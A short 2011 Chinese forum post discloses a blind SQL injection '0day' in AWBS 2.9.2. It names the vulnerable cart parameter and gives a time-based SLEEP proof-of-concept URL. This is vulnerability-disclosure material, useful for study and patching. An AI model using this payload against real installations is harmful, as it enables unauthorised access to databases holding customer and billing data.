邓学梅 發表於 2011-3-11 11:59:20

AWBS 2.9.2 Blind SQL 注入0day

<p>  影响版本:AWBS 2.9.2</p>
<p>  官方网站:http://www.awbs.com</p>
<p>  漏洞类型:SQL注入</p>
<p>  漏洞描述:</p>
<p>  ---Vulnerability---</p>
<p>  http(s):///cart?ca=add_other&amp;oid='</p>
<p>  =============================================================================================</p>
<p>  ---PoC Using Time-Based Blind SQL Injection---</p>
<p>  https://www.vulnerablehost.com/cart?ca=add_other&amp;oid=1'%20AND%20SLEEP(100)='</p>
<p>&nbsp;</p>
頁: [1]
查看完整版本: AWBS 2.9.2 Blind SQL 注入0day